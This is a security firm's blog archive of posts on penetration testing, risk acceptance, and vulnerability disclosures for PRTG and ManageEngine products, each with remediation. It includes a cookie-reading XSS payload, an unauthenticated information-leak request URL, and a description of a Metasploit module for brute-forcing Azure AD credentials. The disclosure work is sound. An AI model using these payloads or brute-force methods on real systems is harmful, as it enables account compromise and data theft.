Tag: Vulnerability Management

  • Accepting Penetration Test Risks & How Compensating Controls Can Help

    Accepting Penetration Test Risks & How Compensating Controls Can Help

    As the head of project management at Raxis, I have been a part of many customer debriefing calls. Generally, these calls just entail the penetration tester discussing the findings on the report and answering questions such a priority to fix or best options for correcting them.

    In some cases, though, there is no way to fix the finding, at least in the near term. Organizations that are looking to correct all findings in order to provide the most secure environment for their customers and to meet compliance requirements look to our team for advice.

    In this blog, I’ll discuss the options of accepting risks or using compensating controls to limit the risks as much as possible until a larger solution can be implemented.

    Circuit and unlocked padlock

    ACCEPTING RISKS

    When dealing with penetration test findings, organizations sometimes have to accept certain risks instead of fixing them immediately. The decision is often part of a broader risk strategy that may mean fixing the issues is not feasible, at least in the short term.

    Resource constraints include financial limitations, such as when the cost of fixing the vulnerability outweighs the potential impact of an exploit. Time constraints also come into play when fixing the vulnerability might delay critical projects or updates.

    In these cases, we often recommend that the organization thoroughly discuss, and, if appropriate, accept the risk. The risk is still there, but the proper stakeholders within the company will understand the risks involved and document acceptance of the risk.

    When deciding to accept penetration test risks, organizations should follow a formal risk acceptance process:

    • Thoroughly document the vulnerability and associated risk
    • Perform a detailed impact analysis, including input from several departments when necessary
    • Identify and implement compensating controls
    • Get sign-off from appropriate stakeholders, such as a CISO or CIO
    • Set a timeline to re-evaluate the risk
    • Monitor the risk closely

    COMPENSATING CONTROLS

    Compensating controls could include several measures that are positives to have in place at any time in case of newly discovered vulnerabilities or other issues. Examples of compensating controls include:

    • Encrypting sensitive data at rest and in transit
    • Implementing strong access controls such as least privilege, and multi-factor authentication
    • Enhancing monitoring and alerting for the affected systems to allow for rapid detection and response if the vulnerability is exploited
    • Network segmentation to contain the spread of an attack
    • Keeping systems as up-to-date as possible with available patches
    Closed padlocks and an unlocked padlock

    LOWERING FINDING RISKS WITH MITIGATION

    Often vulnerabilities that cannot be fixed involve legacy software that no longer receives updates from the vendor but is necessary to business operations. In these cases, until the legacy systems can be replaced, organizations can decrease risk by segmenting the system to an entirely separate area of the internal network. This way, if a compromise occurs, the rest of the network is protected.

    While this does not remove the risk from the penetration test, we’re able to lower the risk of the finding if our customer lets us know and gives us access to test that the segmentation is correctly in place.

    Another case we often see are custom web or mobile applications and APIs. Updates to codebases may be a major effort that requires planning and waiting for resources to become available to make the changes. In other cases, custom code relies on vendor APIs and changes must wait for vendor API updates.

    Each of these cases is unique, but there may be opportunities to limit access to the at-risk functionality or to put in place strong compensating controls.

    CONCLUSION

    We understand that many factors come into play when working to keep your company and customers as secure as possible. Options are available to allow organizations to stay as secure as possible while working towards a more permanent solution.

  • RAXIS THREAT ALERT: VULNERABILITY IN OPENSSL v3.0.x

    RAXIS THREAT ALERT: VULNERABILITY IN OPENSSL v3.0.x

    UPDATE: Subsequent to publication of this blog post, the OpenSSL vulnerabilities were assigned CVE-2022-37786 and CVE-2022-3602, patches were released by OpenSSL, and the threat level was downgraded from “critical” to “high.”

    In the cyberworld, news of a critical vulnerability affecting OpenSSL versions 3.0 – 3.0.6 will likely be the scariest part of Halloween ’22. Especially since the OG ‘critical’ rating from OpenSLL went to the aptly named “Heartbleed” bug from 2014.

    There is a lot of buzz online about this vulnerability, but here’s what we know for sure:

    • It really could be that serious. The OpenSSL project management team says it’s critical, and they are not known for crying ‘wolf’ without reason. By the organization’s standards, ‘critical’ means it may be easily exploitable, many users could be affected, and the destructive potential is high.
    • So, you definitely need to patch. OpenSSL’s software is ubiquitous in the world of security and encryption. Though 98% of instances are still version 1.1.1, the 1.5% using version 3.0.x includes some very popular Linux distributions, including Red Hat Enterprise Linux (RHEL) 9.x, Ubuntu version 22.04, and many others.
    • And you need to patch ASAP. OpenSSL is making the patch available tomorrow, November 1, beginning at 8 AM and should be complete by noon U.S. Eastern Time. According to an OpenSSL spokesman, the rationale behind announcing the vulnerability before the patch is ready is to give organizations time to identify the systems that need to be patched and assemble the resources necessary to do so.

    How can you be sure that all your relevant systems are patched? Once you’ve installed the updates, a comprehensive assessment of each host can insure you’ve properly updated. As always, a Raxis penetration test can also reveal unpatched or out-of-date software from OpenSSL or any other provider. What’s more, our team can show you proof of what assets are at risk and why.

  • CVE-2022-35739: PRTG Network Monitor Cascading Style Sheets (CSS) Injection

    CVE-2022-35739: PRTG Network Monitor Cascading Style Sheets (CSS) Injection

    I’m Matt Mathur, lead penetration tester here at Raxis. I recently discovered a cascading style sheet (CSS) injection vulnerability in PRTG Network Monitor.

    Summary

    PRTG Network Monitor does not prevent custom input for a device’s icon, which can be modified to insert arbitrary content into the style tag for that device. When the device page loads, the arbitrary CSS is inserted into the style tag, loading malicious content. Due to PRTG Network Monitor preventing “ characters, and from modern browsers disabling JavaScript support in style tags, this vulnerability could not be escalated into a Cross-Site Scripting vulnerability.

    Proof of Concept

    The vulnerability lies in a device’s properties and how they are verified and displayed within PRTG Network Monitor. When editing or creating a device, the device’s icon value is not verified to be one of the icon selections, and any text can be inserted in its place, as shown here:

    CSS Injection Payload

    When the device’s icon is then loaded in any subsequent pages (e.g., the Devices page), the content is loaded unescaped inside of the style tag, as shown below:

    Payload Insertion Point

    This allows malicious users to insert (almost) any CSS they want in place of the icon. A malicious user can cause an HTTP request to an arbitrary domain/IP address by setting a background-image property in the payload, as shown here:

    Payload Execution Causing HTTP Request to Controlled Server

    The impact of this vulnerability is less severe due to modern browsers preventing JavaScript in style tags, and from PRTG Network Monitor preventing “ characters in the payload. These steps prevent this vulnerability from being escalated into a Cross-Site Scripting vulnerability.

    Affected Versions

    Raxis discovered this vulnerability on PRTG Network Monitor version 22.2.77.2204.

    Remediation

    A fix for CVE-2022-35739 has not been released. When a fix is released, upgrade to the newest version to fully remediate the vulnerability. In the meantime, Raxis recommends keeping a small list of users who can edit devices to limit the impact of the vulnerability. CVE-2022-35739 has minimal damage potential and is difficult to execute, and thus does not warrant additional protections while waiting for a remediation.

    Disclosure Timeline
    • July 7, 2022 – Vulnerability reported to Paessler Technologies.
    • July 8, 2022 – Paessler Technologies begins investigating vulnerability.
    • July 14, 2022 – CVE-2022-35739 assigned to this vulnerability.
    • August 8, 2022 – Outreach to Paessler Technologies without response.
    • October 4, 2022 – Second outreach to Paessler Technologies without response.
    • October 7, 2022 – Third outreach to Paessler Technologies without response.
    • October 21, 2022 – Original blog post detailing CVE-2022-35739 released.
    CVE Links
  • CVE-2022-26653 & CVE-2022-26777: ManageEngine Remote Access Plus Guest User Insecure Direct Object References

    CVE-2022-26653 & CVE-2022-26777: ManageEngine Remote Access Plus Guest User Insecure Direct Object References


    I’m Matt Dunn, lead penetration tester at Raxis, and I’ve uncovered a couple more ManageEngine vulnerabilities you should know about if your company is using the platform.

    Summary

    I discovered two instances in ManageEngine Remote Access Plus where a user with Guest permissions can access administrative details of the installation. In each case, an authenticated ‘Guest’ user can make a direct request to the /dcapi/ API endpoint to retrieve information. This allows the ‘Guest’ user to discover information about the connected Domains as well as the License information for the installation.

    Proof of Concept

    The two vulnerabilities are similar in that they allow a user with ‘Guest’ level permissions to access details about the installation. Each CVE refers to a specific piece of information that the user can retrieve, as detailed below:

    CVE-2022-26653 – The ‘Guest’ user can retrieve details of connected Domains.

    CVE-2022-26777 – The ‘Guest’ user can retrieve details about the installation’s License.

    The user with ‘Guest’ permissions can access all the Domain’s details, including the connected Domain Controller, the account used for authentication, and when it was last updated, as shown here:

    Guest User Can Access All Domain Details

    Similarly, the ‘Guest’ user can access all the License information, including the amount of users, amount of managed systems, who the license is for, and the exact build number, as shown below:

    Guest User Can Access All License Details

    Affected Versions

    Raxis discovered these vulnerabilities on ManageEngine Remote Access Plus version 10.1.2137.6.

    Remediation

    Upgrade ManageEngine Remote Access Plus to Version 10 Build 10.1.2137.15 or later which can be found here:

    Disclosure Timeline

    • February 16, 2022 – Vulnerabilities reported to Zoho
    • February 17, 2022 – Zoho begins investigation into reports
    • March 8, 2022 – CVE-2022-26653 is assigned to the Domain Details vulnerability
    • March 9, 2022 – CVE-2022-26777 is assigned to the License Details vulnerability
    • April 8, 2022 – Zoho releases fixed version 11 Build 10.1.2137.15 that addresses both vulnerabilities
    CVE Links

    CVE-2022-26653

    CVE-2022-26777

     

  • CVE-2022-25245: ManageEngine Asset Explorer Information Leakage

    CVE-2022-25245: ManageEngine Asset Explorer Information Leakage

    I’m Matt Dunn, a lead penetration tester at Raxis. Recently, I discovered an information leakage in ManageEngine Asset Explorer. This is a relatively minor information leakage, as it only leaks the currency that a current vendor uses. Though minor, it could lead to other inferred information such as vendor location based on their currency.

    Proof of Concept

    The information leakage occurs in the AJaxDomainServlet when given the action of getVendorCurrency. This servlet action does not require authentication, allowing a user to obtain a vendor’s currency with a GET request to a URL similar to the following:

    http://192.168.148.128:8011/domainServlet/AJaxDomainServlet?action=getVendorCurrency&vendorId=3

    In this example URL, we request the currency for the vendor with the specified vendorId. If the vendor doesn’t have an assigned currency, the dollar symbol is returned. If it does, the vendor’s specific currency identifier is returned, as shown here:

    Vendor Currency Revealed in Unauthenticated Request
    Affected Versions

    Raxis discovered this vulnerability on Manage Engine Asset Explorer Plus 6.9 Build 6970.

    Remediation

    Upgrade ManageEngine Asset Explorer to Version 6.9 Build 6971 or later, which can be found here:

    Disclosure Timeline
    • February 14, 2022 – Vulnerability reported to Zoho
    • February 15, 2022 – Zoho begins investigation into report
    • February 16, 2022 CVE-2022-25245 is assigned to this vulnerability
    • March 9, 2022 – Zoho releases fixed version 6.9 Build 6971
    CVE Links

     

  • CVE-2022-24681: ManageEngine AD SelfService Plus Stored Cross-Site Scripting (XSS)

    CVE-2022-24681: ManageEngine AD SelfService Plus Stored Cross-Site Scripting (XSS)

    I’m Matt Dunn, a lead penetration tester here at Raxis. Recently, I discovered a stored Cross-Site Scripting vulnerability in Zoho’s ManageEngine AD SelfService Plus.

    Summary

    The vulnerability exists in the /accounts/authVerify page, which is used for the forgot password, change password, and unlock account functionalities.

    Proof of Concept

    The vulnerability can be triggered by inserting html content, specifically tags that support JavaScript, into the first or last name of an Active Directory user. The following was inserted as a proof of concept to reflect the user’s cookie in an alert box:

    <img src=x onerror=”alert(document.cookie)”/>

    An example of this in the Last Name field of one such user is shown here:

    Stored XSS Payload

    The next time that user forgets, attempts to change, or is locked out of their account and they load the authVerify page, their name is presented without being sanitized. The unescaped HTML as loaded can be seen in Figure 2:

    Unescaped JavaScript Tags

    After the user attempts to reset their password, the malicious content is executed, as shown in Figure 3:

    JavaScript Execution to Display User's Cookie in an Alert Box

    If the user must change their password on login, the malicious content is executed, as shown in Figure 4:

    Payload Execution on Change Password Page

    If the user attempts to unlock their account, the malicious content is executed, as shown in Figure 5:

    Payload Execution on Account Unlock
    Affected Versions

    Raxis discovered this vulnerability on Manage Engine AD SelfService Plus 6.1 Build 6119.

    Remediation

    Upgrade ManageEngine AD SelfService Plus to Version 6.1 Build 6121 or later immediately:

    Disclosure Timeline
    • January 22, 2022 – Vulnerability reported to Zoho
    • January 22, 2022 – Zoho begins investigation into report
    • February 9, 2022 CVE-2022-24681 is assigned to this vulnerability
    • March 7, 2022 – Zoho releases fixed version 6.1 Build 6121
    CVE Links

     

  • What is Web App Pentesting? (Part Two)

    What is Web App Pentesting? (Part Two)

    I’m Matt Dunn, a lead penetration tester at Raxis. This is the second of a two-part series, aimed at explaining the differences between authenticated and unauthenticated web application testing. I’ll also discuss the types of attacks we attempt in each scenario so you can see your app the way a hacker would.

    Although some applications allow users to access some or all their functionality without providing credentials – think of simple mortgage or BMI calculators, among many others – most require some form of authentication to ensure you are authorized to use it. If there are multiple user roles, authentication will also determine what privileges you have and/or what features you can access. This is commonly referred to as role-based access control.

    As I mentioned in the previous post, Raxis conducts web application testing from the perspectives of both authenticated and unauthenticated users. In authenticated user scenarios, we also test the security and business logic of the app for all user roles. Here’s what that looks like from a customer perspective.

    Unauthenticated Testing

    As the name suggests, testing as an unauthenticated user involves looking for vulnerabilities that are public-facing. The most obvious is access: Can we use our knowledge and tools to get past the authentication process? If so, that’s a serious problem, but it’s not the only thing we check.

    In previous articles and videos, we’ve talked about account enumeration – finding valid usernames based on error messages, response lengths, or response times. We will see what information the app provides after unsuccessful login attempts. If we can get a valid username, then we can use other tools and tactics to determine the password. As an example, see the two different responses from a forgot password API for valid and invalid usernames below:

    Different Responses for Valid and Invalid Usernames

    From an unauthenticated standpoint, we also will try injection attacks, such as SQL Injection, to attempt to break past login mechanisms. We’ll also look for protections using HTTP headers, such as Strict-Transport-Security and X-Frame-Options or Content-Security-Policy, to ensure users are as secure as they can be.

    With some applications, we can use a web proxy tool to see which policies are enforced on the client-side interface and which are enforced on the server side. In a future post, we’ll go into more detail about web proxies. For now, it’s only important to know that proxies sometimes reveal vulnerabilities that allow us to bypass security used on the client and allow us to interact with the server directly.

    As an example, fields that require specific values, such as an email field, may be verified to be in the proper format on the client-side (i.e. using JavaScript). Without proper safeguards in place, however, the server itself might accept any data, including malicious code, entered directly into that same field. In practice, this can be bypassed, leading to attacks such as Cross-Site Scripting, as shown in my CVE-2021-27956 that bypasses email verification.

    Authenticated Testing

    During an authenticated web application test, we use many of the same tactics, toward the same ends, as we do with unauthenticated tests. However, we have the added advantage of user access. This vantage point exposes the application to more vulnerabilities due to the expanded surface area of the application. This is why we recommend authenticated testing, to ensure even a malicious user cannot attack the application.

    Once authenticated, we attempt is to see if the app restricts users to the level of access that matches its business logic. This might mean we log in with freemium-level credentials and see if we can get to paid-users-only functionality. Or, in the role of a basic user, we may try to gain administrator privileges.

    As with an unauthenticated test, we also see how much filtering of data is done at the interface vs. the server. Some apps have very tight server-level controls for authentication but rely on less-restrictive policies once the user is validated.

    Though it may seem simple from the outside, one of the hardest things for web app developers to secure is file uploads.

    This is another topic we’ll explore further in a future post, however, one good example of the complexity involved is photo uploads. Many apps enable or require users to create profiles that include pictures or avatars. One way to restrict the file type is by accepting only .jpg or .png file extensions. Hackers can sometimes get past this restriction by appending an executable file with a double extension – malware.exe.jpg, for example.

    Another problem is that malicious code could be inserted into otherwise legitimate file types such as word documents or spreadsheets. For many apps, however, it’s absolutely necessary to allow these file types. When we encounter such situations, we often work with the customers and recommend other security measures that allow the app to work as advertised but that also detect and block malware.

    Conclusion

    As a software engineer by training, one advantage I have in testing web applications is understanding the mindset of the developers working on them. People building apps start with the goal of creating something useful for customers. As time goes on, the team changes or users’ needs change, and sometimes vulnerabilities are left behind. This can happen in expected ways, such as outdated libraries, or unexpected ways, such as missing access control on a mostly unused account type.

    At Raxis, we employ a group of experts with diverse experiences and skillsets who will intentionally try to break the app and use it improperly. Having testers who have also developed applications gives us empathy for app creators. Even as we attack their work, we know that we are helping them remediate vulnerabilities and making it possible for them to achieve their application’s purpose.

    Want to learn more? Take a look at the first part of our Web Application Penetration Testing discussion.

  • How to Hire a Penetration Testing Firm – Part 1

    How to Hire a Penetration Testing Firm – Part 1

    I’m Bonnie Smyre, Raxis’ Chief Operating Officer. Penetration testing is a niche in the cybersecurity field, but one that is critical to the integrity of your network and your data. This is the first of a two-part guide to help you select the right firm for your needs.

    Step 1: Identify Your Why

    There are lots of reasons why companies should routinely do penetration testing. The most important is to understand your vulnerabilities as they appear to hackers in the real world and work to harden your defenses. It may also be that your industry or profession requires testing to comply with certain laws or regulations. Or perhaps you’ve been warned about a specific, credible threat.

    Whatever your reasons for seeking help, you’ll want to look for a firm that has relevant experience. For example, if you run a medical office, you’ll need a penetration testing company that knows the ins and outs of the Health Insurance Portability and Accountability Act (HIPAA). If you’re a manufacturer with industrial control systems, you’ll need a company that understands supervisory control and data acquisition (SCADA) testing. The point is to make sure you know your why before you look for a pentest firm.

    See a term you don’t recognize? Look it up in our glossary.

    Step 2: Understand What You Have at Risk

    A closely related task is to be clear about what all you need to protect. Though it might seem obvious from the above examples, companies sometimes realize too late that they are custodians of data seemingly unrelated to their primary mission. A law firm, for instance, might receive and inadvertently store login credentials to access clients’ medical transcripts or bank accounts. Though its case files are stored on a secure server, a clever hacker could potentially steal personal identifiable information (PII) from the local hard drives.

    Step 3: Determine What Type of Test You Need

    General use of the term “pentesting” can cover a broad range of services, from almost-anything-goes red team engagements to vulnerability scans, though the latter is not a true penetration test. In last week’s post, lead penetration tester Matt Dunn discussed web application testing. There are also internal and external tests, as well as wireless, mobile, and API testing, to name a few. Raxis even offers continuous penetration testing for customers who need the ongoing assurance of security in any of these areas.

    Raxis offers several types of penetration tests depending on your company’s needs:

    Step 4: Consult Your Trusted Advisors

    Most companies have IT experts onboard or on contract to manage and maintain their information systems. You may be inclined to start your search for a penetration testing service by asking for recommendations from them – and that’s a good idea. Most consultants, such as managed service providers (MSPs), value-added resellers (VARs), and independent software vendors (ISVs), recognize the value of high-quality, independent penetration testing.

    In the case of MSPs, it might even be part of their service offerings. However, it might make sense to insist on an arm’s-length relationship between the company doing the testing and the people doing the remediation.

    If your provider is resistant to pentesting, it might be because the company is concerned that the findings will reflect poorly on its work. You can work through those issues by making it clear that you share an interest in improving security and that’s the purpose for testing.

    The downloadable PDF below includes this list of Raxis services with an explanation of what we test and and a brief explanation of how we go about it.

    Raxis Penetration Testing Services
    Step 5: Consider Ratings and Review Sites

    Another starting point – or at least a data point – is review and rating sites. This can be incredibly helpful since such sites usually include additional information about the services offered, types of customers, pricing, staffing, etc. That gives you a chance to compare the areas of expertise with the needs you identified in steps one and two. It can also introduce you to companies you might not have found otherwise.

    Here are some resources you might find helpful as a start:

    Step 6: Check References

    Once you have your short list of companies, it’s a good idea to talk to some of their customers, if possible, to find out what they liked or didn’t like about the service. Ask about communications. Were they kept in the loop about what was going on? Did the company explain both successful and unsuccessful breach attempts? Did they get a clear picture of the issues, presented as actionable storyboards?

    In addition, it’s a good idea to ask about the people they worked with. Were they professional? Was it a full team or an individual? Do they bring a variety of skillsets to the table? Did they take time to understand your business model and test in a way that made sense? It’s important to remember here that many pentesting customers insist on privacy. The company may not be able to provide some references and others may not be willing to discuss the experience, However, some will, and that will add to your knowledgebase.

    If you’ve completed steps 1 through 6, you should be armed with the information you need to begin interviewing potential penetration testing companies. You’ll be able to explain what you need and gauge whether they seem like a good match or not. And you’ll know how their customers feel about their service.

    If you found this post helpful, make sure to follow our blog. In the weeks ahead, we’ll be discussing the questions you should ask potential pentesting companies – and the answers you should expect to hear.

    Want to learn more? Take a look at the second part in our How to Hire a Penetration Testing Firm Series.

  • What is Web Application Penetration Testing?

    What is Web Application Penetration Testing?

    I’m Matt Dunn, a lead penetration tester at Raxis. In this series of posts, I’m going to introduce you to the Raxis method of penetration testing web applications. We’ll start with a look at what a web app test involves and how it differs from the network testing we do.

    By their very nature, web apps deserve special scrutiny because they are designed in most cases to be accessible to a broad base of users, often with different roles that convey higher levels of privilege or access. Additionally, they are often used to perform wide ranging functionality, from shopping and banking transactions, to accessing healthcare data. With that accessibility and functionality comes exposure to a wide range of threats from malicious actors who want to exfiltrate data, modify the application, or otherwise disrupt its operation.

    When Raxis performs a web application penetration test, we typically approach it from the viewpoint of both unauthenticated and authenticated user roles. In many cases, some of the app’s functionality is going to be behind some form of authentication. We’ll go into greater detail about authenticated and non-authenticated tests in a subsequent post. For now, however, we’ll limit the discussion to tests in which we are given credentials for all user roles.

    Armed with the appropriate credentials, we examine all the functionality of the app to find out what features are accessible to users and how the application is intended to work. Can users’ profiles be changed? Are users allowed to upload files? Where can the user input their own content? What is each user supposed to be allowed to do? These are just some of the questions we’re looking to answer in the beginning of the test.

    Once we know what the app should do, we’ll test all these features to see if the business logic is correct. For example, an app may allow only administrators to delete uploaded files. So, we’ll attempt to circumvent that restriction and see if we can accomplish that with lower-privileged credentials.

    Raxis approaches a web application test from the perspective of unauthenticated users and authenticated users in multiple roles when more than one role exists.

    Login webpage with username and password

    Next, we will try to exploit the app’s features. For instance, we’ll test the various input fields to see if we can insert malicious code. If so, the app may be vulnerable to cross-site scripting (XSS) – a topic I’ve covered extensively on our blog and YouTube channel. In a similar manner, we’ll test areas where we can upload files to see if we can upload malicious content as part of an attack.

    One question we get from time to time is whether web application testing is included as part of our network penetration tests. The answer is no, for two reasons: First, it’s unlikely that, within the time of a well-scoped network test, we will be able to find credentials to all roles and parts of your web app. Second, network tests are broader in scope and identify the highest risk vulnerabilities across the entire network (as time allows). Depending on other findings, we often test the accessible pages as well as the authentication features. These include logins and “forgot password” pages, to name just a couple. Our goal is to see if we can gain unauthorized access, perform account enumeration, or attack the application externally. But we won’t test as a verified user unless we’re able to gain authenticated access, and even then, we will not focus on the web app in the same depth as we would in a web app test.

    That’s what makes web application testing so important. And with so many companies relying on (or even built around) web apps, it makes sense to conduct these tests regularly and address the findings in order of priority. Even if you are already performing network penetration tests, I strongly recommend that you conduct specific web application tests as well.

    Want to learn more? Take a look at the second part of our Web Application Penetration Testing discussion.

  • Entering the Metaverse: You are the Real Commodity

    Entering the Metaverse: You are the Real Commodity

    In case you’ve been locked in a cave for the past few months, I’m writing to warn you that the metaverse is nearly here. And by “nearly here,” I mean that it has been here for years in one form or another. The difference now is that Facebook changed its (corporate) name and the media has decreed that the metaverse shall be its new shiny object for a while.

    Reality 2.0?

    As to whether the metaverse is a cause for concern or celebration, the answer is both. It will certainly bring exciting new opportunities, especially on the social front. People have a need to interact with each other – as evidenced by the success of social media — and this technology promises to make it more convenient and fun. Imagine being able to feel like you’re sitting next to a family member who is, in reality, 2,000 miles away. 

    There are other benefits as well. For example, doctors might perform complicated surgeries for patients on the other side of the world. We could all climb Mt. Everest, dive the Great Barrier Reef, or trek to Machu Picchu without exposing ourselves to the existential dangers or creating more environmental impact. Our imaginations are really the only limits in a virtual world.

    As an ethical hacker and penetration tester, however, I can’t help but see the downside risks as well.

    Yes, it will be hacked.

    Starting with the obvious, all the same threats that exist in the current tech world will exist in the metaverse, and there’s a chance others may be created. For example, a phishing attack could provide an attacker with permissions to control your bank account or even become you by controlling your avatar. It will become extremely important to validate people that we interact with since “becoming” someone else’s avatar could be very convincing even in a real-time conversation.

    Blockchain technology seems like the odds-on favorite to protect against identity theft and fraud in the virtual world, but that will bring its own set of issues. So, the cat-and-mouse games between good and evil will carry on, but the stakes could get higher as we entrust more of our lives and ourselves to the metaverse.

    “Beyond the overtly malicious threats, it’s important to remember that the new virtual world is not being created as a social experiment or an act of altruism. It is big business, plain and simple.”

    Mark Puckett

    Like any responsible corporate leaders, Zuckerberg and company are only willing to invest incredible amounts of money because they intend to make a profit that justifies the risk. It pays to think about the ways they might go about that.

    Business in, business out.

    There have already been at least two $1M+ “real estate” transactions in the metaverse. For now, these investments are mostly speculative. However, as innovations in augmented reality (AR) bring it into the mainstream, they could pay enormous dividends.

    One reason is because reams of data will be captured in real time about the users and their environment.  Your location, the people you talk to, the items you browse at stores, the billboards you look at, the writing you read, and the words you speak can all be potentially stored. Images of bystanders that have not agreed to be recorded could be facially recognized and stored. 

    Certainly, controls will be in place to protect privacy, but a cyberattack could put this data at risk. There’s also the very real possibility that the people who own the virtual real estate will use the information they gather to control the way we experience it. 

    “Reams of data will be captured in real time about the users and their environment.  Your location, the people you talk to, the items you browse at stores, the billboards you look at, the writing you read, and the words you speak can all be potentially stored. Images of bystanders that have not agreed to be recorded could be facially recognized and stored. ”

    Mark Puckett

    As just one practical example, imagine that you, in the form of your avatar, look at tents and camping gear in a store window. Without entering any information or clicking on any links, you’ve given a strong signal of interest. You might then start to notice mountains on the horizon, virtual trails along your path, and receive invitations to joins clubs with similar interests.

    Sooner or later, you’ll find coupons for real-world excursions in your mail. You may even realize that some of your virtual friends are just skilled marketers or even bots.

    Hearts and minds in the mix.

    Now consider that it might not be a product, but a political candidate or point of view you’re being sold. Such an immersive experience puts a lot of power into the hands of the people who control that world.

    The most important point to remember about the metaverse is that you and I are its most important commodities. That’s why it’s helpful to know up front how much of ourselves and our privacy we’re expected and willing to give up as payment for the experience. 

    The good news is that, despite the media hype, we won’t all awaken one day as avatars. Just as social media consumed us bit by bit, so too will this new virtual world. My hope is that we truly learn the lessons from the former to improve our experience with the latter.

  • New Metasploit Module: Azure AD Login Scanner

    New Metasploit Module: Azure AD Login Scanner

    Summary

    In June of 2021, Secureworks Counter Threat Unit (CTU) discovered that the protocol used by Azure Active Directory (AD) Seamless Single Sign-On (SSO) allows for brute-forcing usernames and passwords without generating log events on the targeted tenant. In addition to brute-forcing credential pairs, the Azure endpoint returns error codes that allow for username enumeration. This post details the vulnerable endpoint, and how it can be exploited to brute-force usernames and passwords in a succinct Metasploit module.

    Vulnerability Description

    In addition to the normal Azure AD authentication workflow for SSO, which utilizes Kerberos, the usernamemixed endpoint of Autologon accepts single-factor authentication. Authentication attempts to this endpoint are in XML, as shown here:

    Example XML Authentication Request

    The Autologon endpoint takes these credentials and sends them to Azure AD to authenticate the user. If the credentials are valid, the authentication is successful, and the Autologon endpoint responds with XML containing a DesktopSsoToken, which is used to further connect and authenticate with Azure AD. When a successful logon occurs, Azure AD properly logs the event.

    However, on authentication attempts that are unsuccessful, the authentication attempt does not get logged by the tenant. If the credentials are invalid, the Autologon endpoint responds with XML containing a specific error code for the authentication attempt, as shown here:

    Detailed Error Code in XML Response

    The error code provided in this response can be further used to determine valid usernames, whether MFA is needed, if the user has no password in Azure AD, and more. The error codes used in the Metasploit module I developed are shown below:

    Error Codes
    Metasploit Module

    The Metasploit module (auxiliary/scanner/http/azure_ad_login) can enumerate usernames or brute-force username/password pairs based on the responses from the Autologon endpoint described above. If you have a target tenant using Azure AD SSO and usernames/passwords to validate, you can use this module by setting the following variables:

    • DOMAIN – The target tenant’s domain (e.g., bionicle.dev)
    • USERNAME or USER_FILE – A single username to test or a file containing usernames (one per line)
    • PASSWORD or PASS_FILE – A single password or a file containing passwords (one per line)

    When you run the module, every username/password pair is tested using the authentication XML request shown above to validate the pairing. When a valid username/password pairing is found, the DesktopSsoToken is also displayed to the user, as shown here:

    Example Azure AD Login Module Usage
    Remediation and Protection

    As of the writing of this post, there is no direct remediation to this vulnerability if your organization is using Azure AD with Single Sign-On. Microsoft has deemed this part of the normal workflow, and thus there are no known plans to remediate the endpoint. From a defender’s point of view, this vulnerability is particularly difficult to defend against due to the lack of logs from invalid login attempts. Raxis recommends the following to help defend against this vulnerability:

    • Ensure users set strong passwords in Active Directory by having a strong password policy.
    • Enable Multi-Factor Authentication on all services that may use AD credentials in case a valid username/password pair is discovered.
    • Consider setting a Smart Lockout policy in Azure that will lock out accounts targeted by brute-force attacks. This won’t help with password spraying, but will for single user brute-forcing.
    • Monitor for unusual successful logins from users (e.g. unusual locations).
    • Educate users about password hygiene so that they can learn to set strong passwords that won’t be caught by password spraying attacks.
    Metasploit Module Details
    References

     

  • Cross-Site Scripting (XSS): Filter Evasion and Sideloading

    Cross-Site Scripting (XSS): Filter Evasion and Sideloading

    This is the second video in my three-part series about cross-site scripting (XSS), a type of injection attack that results from user-supplied data that is not properly sanitized or filtered from an application. In the previous video, I discussed the basics of how XSS works and offered some recommendations on how steps to protect against it.

    In this video, we’ll take it a step further. I’ll show you some techniques hackers use to get past common remediation efforts. First is filter evasion, which uses different types of tags to insert malicious code when filters are in place to prevent scripts from running. The second is a technique I call sideloading content, importing third-party content in order to deliver a malicious payload.

    Injection attacks are number three on the OWASP Top 10 list of frequently occurring vulnerabilities, and, indeed, they are a finding Raxis discovers quite frequently. (Over the past year, I have discovered five XSS CVEs.) So, in addition to explaining how these attacks work, I also explain how to stop them.

    In my next video, we’ll take a look at some more advanced methods for cross-site scripting, again with some remediation tips included. So, if you haven’t done so already, please subscribe to our YouTube channel and watch for new content from the Raxis team.

    Want to learn more? Take a look at the first part in our Cross-Site Scripting Series.